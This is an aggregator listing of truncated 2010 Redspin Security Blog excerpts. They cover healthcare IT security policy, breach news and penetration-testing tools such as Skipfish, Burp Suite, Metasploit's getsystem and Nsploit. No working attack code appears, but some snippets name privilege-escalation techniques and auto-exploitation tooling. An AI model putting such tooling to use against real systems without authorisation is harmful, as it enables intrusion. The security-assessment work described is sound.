http://www.secuobs.com/revue/news/252949.shtmlhttp://www.secuobs.com/revue/news/252949.shtml Secuobs.com : 2010-09-28 23:32:48 - Redspin Security Blog - SoftPerfect makes a great simple and light network scanner that can be used to scan for open shares on your network The product page is here and the program can be downloaded here After downloading netscanexe, double click it to run the program No need to install anything First, you ll need to change the account Network http://www.secuobs.com/revue/news/252575.shtmlhttp://www.secuobs.com/revue/news/252575.shtml Secuobs.com : 2010-09-27 03:31:59 - Redspin Security Blog - The Washington Post reported this morning on the latest development related to Stuxnet malware The Stuxnet code was designed from the bottom up to attack Supervisory Control and Data Acquisition SCADA systems, or those used to manage complex industrial networks, such as systems at power plants and chemical manufacturing facilities The malware, which http://www.secuobs.com/revue/news/251861.shtmlhttp://www.secuobs.com/revue/news/251861.shtml Secuobs.com : 2010-09-20 23:52:07 - Redspin Security Blog - By converting Burp Suite Professional s session files to XML we were able to automate the analysis of the results with XMLStarlet on the command line Using the IBurpExtender interface, we have now automated spidering and scanning in Burp as well BurpExtenderjava takes full advantage of the IBurpExtender interface and accepts a starting URL, output name, and optional http://www.secuobs.com/revue/news/250002.shtmlhttp://www.secuobs.com/revue/news/250002.shtml Secuobs.com : 2010-09-20 03:32:25 - Redspin Security Blog - This week the Economist featured an article about an anti-censorship product called Haystack The product was supposed to provide anti-censorship technology The effort was motivated by events related to the Iranian opposition movement in 2009 when activists used mobile versions of Twitter and Facebook to upload videos of police brutality and spread messages http://www.secuobs.com/revue/news/249650.shtmlhttp://www.secuobs.com/revue/news/249650.shtml Secuobs.com : 2010-09-17 05:22:04 - Redspin Security Blog - Format string attacks remain difficult in both software and hackademic exercises as the techniques have not improved since their discovery This session demonstrates advanced format string attack techniques designed to automate the process from creation to compromise as well as incorporate those techniques into the Metasploit framework The audience is encouraged to bring a basic understanding of format string attacks in order to leave the presentation with the tools necessary to never write one again http://www.secuobs.com/revue/news/248677.shtmlhttp://www.secuobs.com/revue/news/248677.shtml Secuobs.com : 2010-09-17 05:22:04 - Redspin Security Blog - Yesterday Intel took most of the security industry by surprise by announcing a 768 billion acquisition of McAfee The party line justification from Intel was that security will become the third major element of differentiation in Intel s processor franchise, along with energy-efficient performance and connectivity The near term beneficiaries seem to be McAfee http://www.secuobs.com/revue/news/248676.shtmlhttp://www.secuobs.com/revue/news/248676.shtml Secuobs.com : 2010-09-17 05:22:04 - Redspin Security Blog - The unbridled use of social media in the workplace represents a growing area of risk to an organization s information security posture Social media networks present two distinct attack vectors information leakage and false trust Hackers, red teams and experienced penetration testers have used OSINT open source intelligence style information gathering for years But now that social http://www.secuobs.com/revue/news/248675.shtmlhttp://www.secuobs.com/revue/news/248675.shtml Secuobs.com : 2010-09-17 05:22:04 - Redspin Security Blog - Last week the ONC privacy and security tiger team for the healthcare IT committee provided guidance on patient consent policy Summary slides of their recommendations can be found here and the full documentation can be found here These guidelines are important because the recommendations apply to electronic exchange of patient identifiable health information http://www.secuobs.com/revue/news/248674.shtmlhttp://www.secuobs.com/revue/news/248674.shtml Secuobs.com : 2010-09-17 05:22:04 - Redspin Security Blog - This month s edition of Harvard Business Review features an article on service driven innovation at Kaiser Permanente Kaiser is well known in the healthcare industry as a leader in applying IT to improve quality of care and producing better business results The organization routinely outspends its peers on IT as a percent of http://www.secuobs.com/revue/news/248673.shtmlhttp://www.secuobs.com/revue/news/248673.shtml Secuobs.com : 2010-09-17 05:22:04 - Redspin Security Blog - Lately I have been thinking about risk in the context of information security and the healthcare industry I have written an article than you can find here about using risk management to help healthcare organizations manage their information security, privacy and compliance programs more effectively and efficiently For the most part using risk http://www.secuobs.com/revue/news/248672.shtmlhttp://www.secuobs.com/revue/news/248672.shtml Secuobs.com : 2010-09-17 05:22:04 - Redspin Security Blog - In my last blog post I discussed information security risk management and why the financial services sector aggressively adopted the practice My recommendation was that the healthcare industry segment needs to follow suit to increase the effectiveness and efficiency of their information security programs It is refreshing to see evidence that this is http://www.secuobs.com/revue/news/248671.shtmlhttp://www.secuobs.com/revue/news/248671.shtml Secuobs.com : 2010-07-29 06:40:31 - Redspin Security Blog - It seems that the realization that applications provide the most dangerous attack vector and the most common area of exposure for enterprise data has begun to take hold with the healthcare and financial services organizations that I have been talking to recently The natural question that results is what should be done What http://www.secuobs.com/revue/news/244939.shtmlhttp://www.secuobs.com/revue/news/244939.shtml Secuobs.com : 2010-07-17 23:55:48 - Redspin Security Blog - Earlier this week the CMS and ONC released the final Standards Rule for meaningful of electronic health records This culminates a process in which the ONC received thousands of comments and struggled to reach a balance between specificity presumed to make certification and implementation a simpler task and generalization which can enable more rapid http://www.secuobs.com/revue/news/241427.shtmlhttp://www.secuobs.com/revue/news/241427.shtml Secuobs.com : 2010-07-08 19:51:17 - Redspin Security Blog - Last week I attended the Healthcare IT Standards Committee meeting The all day meeting covered a wide variety of topics ranging from the interoperability framework, NHIN governance as well as updates from several teams, including the security and privacy tiger team The Office of the National Coordinator ONC who heads this effort has http://www.secuobs.com/revue/news/238799.shtmlhttp://www.secuobs.com/revue/news/238799.shtml Secuobs.com : 2010-06-27 23:35:04 - Redspin Security Blog - Earlier this month the Drug Enforcement Administration DEA revised their regulations surrounding the writing of prescriptions for controlled substances electronically The rule had been published in March on the Federal Register and is now effective Streamlining the process associated with the e-prescribing of controlled substances has many benefits including cost reduction and improvement http://www.secuobs.com/revue/news/235514.shtmlhttp://www.secuobs.com/revue/news/235514.shtml Secuobs.com : 2010-06-25 01:39:22 - Redspin Security Blog - At Redspin we have a unique view of the security space, given that we are hired to perform security assessments of customer web applications all the time Our clients want to know if a hacker can access their Electronically Protected Health Records The answer, sadly, is often yes Many times it is dreadfully easy This http://www.secuobs.com/revue/news/234872.shtmlhttp://www.secuobs.com/revue/news/234872.shtml Secuobs.com : 2010-06-21 22:01:20 - Redspin Security Blog - Last week the media was buzzing with the actions of the California Department of Public Health CDPH The CDPH announced fines of 675,000 against six hospitals that had reported security breaches involving medical records The legal basis for these fines and penalties are associated with two bills that amended California law in 2008, http://www.secuobs.com/revue/news/233573.shtmlhttp://www.secuobs.com/revue/news/233573.shtml Secuobs.com : 2010-06-16 19:23:54 - Redspin Security Blog - Health and Human Services Secretary Kathleen Sebelius is one busy government employee From announcements regarding Regional Extension Center Awards and Job Training Grants to the State Health Information Exchange Cooperative Agreement Program, it s a daunting task to keep up with the acronyms and initiatives For the healthcare provider on the front lines, these announcements are http://www.secuobs.com/revue/news/232161.shtmlhttp://www.secuobs.com/revue/news/232161.shtml Secuobs.com : 2010-06-10 03:19:21 - Redspin Security Blog - This week iPad owners had their emails leaked via a security vulnerability in the way iPads registered with AT T s 3g service Approximately 114,000 email addresses were brute forced from a script that was supposed to recognize an iPad owners ICC ID an unique identifier which turned out to be predictable and supply them an http://www.secuobs.com/revue/news/230262.shtmlhttp://www.secuobs.com/revue/news/230262.shtml Secuobs.com : 2010-06-07 02:29:07 - Redspin Security Blog - I was depressed earlier this week from conversations with a security vendor and a system developer They both had developed, more or less, the same point of view The security vendor said, Compliance is what sells The system developer said, Failed audits are what can get the attention of management Compliance http://www.secuobs.com/revue/news/229035.shtmlhttp://www.secuobs.com/revue/news/229035.shtml Secuobs.com : 2010-05-31 01:27:32 - Redspin Security Blog - In industry surveys ranging from the Symantec Threat Report to Gartner analyst reports, application security is constantly cited as the most significant area of risk for enterprises and the most prevalent threat vector for cyber crime It certainly makes sense, why bother to spend time on reconnaissance when the front door is wide open Many organizations have begun http://www.secuobs.com/revue/news/227076.shtmlhttp://www.secuobs.com/revue/news/227076.shtml Secuobs.com : 2010-05-25 21:53:31 - Redspin Security Blog - Every year the hacking community, both black and whitehat, come together in Las Vegas for the annual Blackhat and Defcon conferences We discuss new attacks, show interesting research, release tools, and let loose a bit Defcon in particular centers around a number of great competitions, the most prestigious of them being the Defcon CTF Hacker teams http://www.secuobs.com/revue/news/225544.shtmlhttp://www.secuobs.com/revue/news/225544.shtml Secuobs.com : 2010-05-23 03:25:17 - Redspin Security Blog - In discussions with customers over the past few weeks the question of how much security is enough for a given organization has been raised repeatedly Contrary to the opinion of some in the industry, this really is not a mysterious issue To understand what is enough security requires understanding an acceptable risk level http://www.secuobs.com/revue/news/224802.shtmlhttp://www.secuobs.com/revue/news/224802.shtml Secuobs.com : 2010-05-14 23:44:35 - Redspin Security Blog - Social networks have become part of the cyber crime fabric Recently a security researcher has provided a tool that simplifies the process of building bot armies that take their marching orders from specially created Twitter accounts TwitterNet Builder offers script kiddies a point-type-and-click interface that forces infected PCs to take commands from a http://www.secuobs.com/revue/news/222356.shtmlhttp://www.secuobs.com/revue/news/222356.shtml Secuobs.com : 2010-05-13 08:51:06 - Redspin Security Blog - Cloud service based deployments have become commonplace in industry segments ranging from financial services to healthcare I have discussed in earlier posts how the cloud services model will come to dominate important areas such as healthcare information exchanges The economic model is highly attractive across a broad range of business problems Several http://www.secuobs.com/revue/news/221753.shtmlhttp://www.secuobs.com/revue/news/221753.shtml Secuobs.com : 2010-05-05 18:38:01 - Redspin Security Blog - Do economics, HIE s and information security seem like a strange set of words to find together I ve been spending a lot of time recently talking with folks at healthcare providers and healthcare IT vendors, and they have found the relationships among these words fascinating What I have encountered is a quite different set http://www.secuobs.com/revue/news/219107.shtmlhttp://www.secuobs.com/revue/news/219107.shtml Secuobs.com : 2010-04-16 19:18:43 - Redspin Security Blog - I ve been spending a lot of time lately working with packet captures I ve been stringing together a long list of silly one-liners to make a very rough pcap vulnerability scanner of sorts This is one of those one-liners One of the main things I first hunt for in network traffic is sensitive data leaving the network http://www.secuobs.com/revue/news/213093.shtmlhttp://www.secuobs.com/revue/news/213093.shtml Secuobs.com : 2010-04-15 21:01:04 - Redspin Security Blog - Customers in industry segments from financial services to healthcare have struggled to protect personally identifiable information Now the National Institute of Standards and Technology have released guidelines to help manage the process of securing PII data Special publication 800-122, titled Guide to Protecting the Confidentiality of Personally Identifiable Information , helps customers to identify, http://www.secuobs.com/revue/news/212620.shtmlhttp://www.secuobs.com/revue/news/212620.shtml Secuobs.com : 2010-04-15 21:01:04 - Redspin Security Blog - For those of you who are struggling to find a way to convert PDF files into TXT files, here is a quick bash script There are many alternatives out there, but none were reliable for me You ll need to have acroread and ghostscript installed for this to work bin bash mkdir ps txt FILES pdf for f in FILES do echo Processing http://www.secuobs.com/revue/news/212619.shtmlhttp://www.secuobs.com/revue/news/212619.shtml Secuobs.com : 2010-04-07 22:35:43 - Redspin Security Blog - Believe me when i say that we ve used a lot of tools We love scripts, we love things that free up our time to do the real analysis on a web application assessment We have used w3af, nikto, Grendel Scan, etc, etc We are really happy to see a new tool we have used in http://www.secuobs.com/revue/news/209895.shtmlhttp://www.secuobs.com/revue/news/209895.shtml Secuobs.com : 2010-04-07 22:35:43 - Redspin Security Blog - This post discusses a tool to automatically check and keep a local copy of skipfish up-to-date http://www.secuobs.com/revue/news/209894.shtmlhttp://www.secuobs.com/revue/news/209894.shtml Secuobs.com : 2010-04-07 01:11:00 - Redspin Security Blog - According to the datalossDBorg, over 110 healthcare organizations have reported the loss of sensitive PHI and or PII data affecting 5,306,000 people since January 1998 Over 40 percent of the losses were related to theft of laptops, tapes or other media Another 27 percent were the result of loss or negligence by staff or http://www.secuobs.com/revue/news/209509.shtmlhttp://www.secuobs.com/revue/news/209509.shtml Secuobs.com : 2010-03-24 22:28:43 - Redspin Security Blog - Burp Suite Professional's session file is not in a useful format to extract data from This post introduces a python script that converts this session file to a XML document http://www.secuobs.com/revue/news/205111.shtmlhttp://www.secuobs.com/revue/news/205111.shtml Secuobs.com : 2010-03-23 00:52:15 - Redspin Security Blog - Last week the Department of Health and Human Services HHS announced an additional round of 162M in funding for Healthcare Information Exchanges Combined with the state grants announced in February, this brings total funding to 547M This means that all the states and state designated entities are on a path towards implementing the http://www.secuobs.com/revue/news/204214.shtmlhttp://www.secuobs.com/revue/news/204214.shtml Secuobs.com : 2010-03-19 23:47:27 - Redspin Security Blog - This morning the office was buzzing with Google hysteria Google, releasing great tools like RATproxy, has released a web application scanner similar to Nikto and to a lesser extent Nessus web Checks Now, we understand that not everyone is a Goog-Fanboy, but we love testing new apps We wrote a cursory install for a testbed machine http://www.secuobs.com/revue/news/203551.shtmlhttp://www.secuobs.com/revue/news/203551.shtml Secuobs.com : 2010-03-19 22:42:40 - Redspin Security Blog - here s the simple commands necessary to get hacking with Google s new web application scanner Skipfish wget http skipfishgooglecodecom files skipfish-100btgz tar zxvf skipfish-100btgz sudo apt-get install libidn11-dev cd skipfish make cp dictionaries defaultwl skipfishwl skipfish -o output_folder http wwwexamplecom you ll want to less README to understand all the options more to come shortly with our opinions, tips and lab results currently we re getting 600 requests second for internet sites, 4000 http://www.secuobs.com/revue/news/203524.shtmlhttp://www.secuobs.com/revue/news/203524.shtml Secuobs.com : 2010-03-17 20:36:20 - Redspin Security Blog - Earlier this week the Office of the National Coordinator for Health Information Technology ONC released an initial draft of its healthcare IT framework and strategic plan This is a high level outline of the themes, principles, strategies and objectives that the ONC will address and reflects an update to the Federal Health IT Strategic http://www.secuobs.com/revue/news/202707.shtmlhttp://www.secuobs.com/revue/news/202707.shtml Secuobs.com : 2010-03-04 17:07:55 - Redspin Security Blog - I spent the last few days at the RSA conference in San Francisco I ve been attending for many years now and there seems to be a growing discontinuity between what s being presented in the sessions and the discussions following and the stories pitched on the expo floor One theme that echoed throughout many vendor booths http://www.secuobs.com/revue/news/198045.shtmlhttp://www.secuobs.com/revue/news/198045.shtml Secuobs.com : 2010-03-04 02:17:29 - Redspin Security Blog - I wrote about this a while back, but it seems like others are taking note The US Federal Trade Commission FTC on Thursday Feb 25 screamed the Emperor has no clothes by reporting to consumers that one of the largest firms issuing Verified Secure Breach Protection seals doesn t really verify much at all The practical impact http://www.secuobs.com/revue/news/197850.shtmlhttp://www.secuobs.com/revue/news/197850.shtml Secuobs.com : 2010-03-03 23:48:49 - Redspin Security Blog - As credit card fraud prevention measures have made it tougher on identity thieves, identity thieves have found a new target, healthcare identities And healthcare information systems are nowhere near ready to withstand the onslaught A recent survey by Chicago-based HIMSS Healthcare Information and Management Systems Society found that most hospitals spend less than 3pourcents of http://www.secuobs.com/revue/news/197783.shtmlhttp://www.secuobs.com/revue/news/197783.shtml Secuobs.com : 2010-02-26 01:56:29 - Redspin Security Blog - Over the last several years many analysts, including Gartner, have identified application security as the area presenting the most significant risk to companies with internet facing applications As a result a number of best practices have emerged, ranging from secure coding practices and developer training from organizations such as Microsoft to change management driven http://www.secuobs.com/revue/news/195768.shtmlhttp://www.secuobs.com/revue/news/195768.shtml Secuobs.com : 2010-02-22 01:33:32 - Redspin Security Blog - The job of keeping up with latest threats and vulnerabilities is a daunting task for security professionals There are many excellent resources for both threats for example, Symantec DeepSight data feeds and vulnerabilities DHS National Cyber Security Division US-CERT But it still requires skilled human effort to synthesize which assets in an organization http://www.secuobs.com/revue/news/193984.shtmlhttp://www.secuobs.com/revue/news/193984.shtml Secuobs.com : 2010-02-19 20:20:47 - Redspin Security Blog - While companies in the healthcare sector focus on HITECH act compliance and meaningful use and healthcare reform dominates the headlines, it is worthwhile to consider some of the business reasons for investing in a strong information security program Modernization of the healthcare payments system is one big area where the potential for cost savings http://www.secuobs.com/revue/news/193636.shtmlhttp://www.secuobs.com/revue/news/193636.shtml Secuobs.com : 2010-02-19 20:20:47 - Redspin Security Blog - Here is an interesting recap of some of the top web incidents of 2009, along with some projections for 2010 It s done by one of the guys at Breach Security It includes a recap and some technical details on the TJX hack, Time s Most Influential Person poll abuse, fun with Twitter, and more A good http://www.secuobs.com/revue/news/193635.shtmlhttp://www.secuobs.com/revue/news/193635.shtml Secuobs.com : 2010-02-19 03:55:04 - Redspin Security Blog - A few weeks ago Chris Gates ala Attack Research Carnal Ownage and Joshua Gauthier showed some quick snippets of Metasploit s Getsystem extension Getsystem is meterpreter s new windows privilege escalation extension used in the priv module Getsystem uses several techniques for priv escalation Windows Impersonation Tokens fixed by MS09-012 Abusing LSASS via token passing Pass-the-Hash which requires Administrator anyway http://www.secuobs.com/revue/news/193382.shtmlhttp://www.secuobs.com/revue/news/193382.shtml Secuobs.com : 2010-02-18 21:51:39 - Redspin Security Blog - This morning the Washington Post once again reported a widespread and ongoing set of attacks sponsored by a cybercriminal organization based in Eastern Europe Amit Yoran of Netwitness was quoted as saying, The traditional security approaches of intrusion-detection systems and anti-virus software are by definition inadequate for these types of sophisticated threats, Yoran http://www.secuobs.com/revue/news/193305.shtmlhttp://www.secuobs.com/revue/news/193305.shtml Secuobs.com : 2010-02-12 22:35:28 - Redspin Security Blog - Ryan Linn has started a project to bridge Nmap Scans all the way to exploitation using Metasploit Similar to the db_autopwn via fasttrack script available in Backtrack 4 , Nsploit does even more granular service level Nmap scanning to identify versions and exploits Then passes of these to Metasploit and launches the pain at your target box It http://www.secuobs.com/revue/news/191501.shtmlhttp://www.secuobs.com/revue/news/191501.shtml Secuobs.com : 2010-02-11 17:49:13 - Redspin Security Blog - In my last few posts I mentioned using risk management as an effective mechanism for combating cyber crime A number of readers from the LinkedIn Information Security Group asked about recommendations for improving their risk management processes In my corporation risk management is mostly controlled by finance We can t seem to get a discussion http://www.secuobs.com/revue/news/190955.shtmlhttp://www.secuobs.com/revue/news/190955.shtml Secuobs.com : 2010-02-05 17:22:37 - Redspin Security Blog - Threats posed by cyber crime have increased dramatically in the past year Yesterday the Washington Post announced that Google has enlisted the help of the NSA to combat cyber crime attacks directed at them and other US corporations While this is sure to generate privacy concerns in the user community, it is more http://www.secuobs.com/revue/news/189001.shtmlhttp://www.secuobs.com/revue/news/189001.shtml Secuobs.com : 2010-02-04 19:50:25 - Redspin Security Blog - I need to express my love for OWASP s Live CD aka OWASP Web Testing Environment Its backtrack-like philosophy of piling in the web-security tools is simple, but the end result is a wonderful testing environment From Firefox action-packed with addons, to the run of standard proxies burp, paros, rat , a multitude of scanners grendel,w3af , and http://www.secuobs.com/revue/news/188660.shtmlhttp://www.secuobs.com/revue/news/188660.shtml Secuobs.com : 2010-02-04 08:04:25 - Redspin Security Blog - CSO magazine recently released the 2010 Cyber Security Watch survey of over 500 respondents from both the public and private sector In reading through the answers I was not surprised to find several results that set off a cause for alarm Of course it s always difficult to draw conclusions from survey results and http://www.secuobs.com/revue/news/188456.shtmlhttp://www.secuobs.com/revue/news/188456.shtml Secuobs.com : 2010-01-22 07:22:18 - Redspin Security Blog - Earlier this month Google discussed the nature of the cyber attacks they have been facing from China The targets included not only politically motivated email accounts, but also attacks on the corporate infrastructure that resulted in theft of intellectual property During their investigations, Google also found evidence of ongoing attacks on major US http://www.secuobs.com/revue/news/184336.shtmlhttp://www.secuobs.com/revue/news/184336.shtml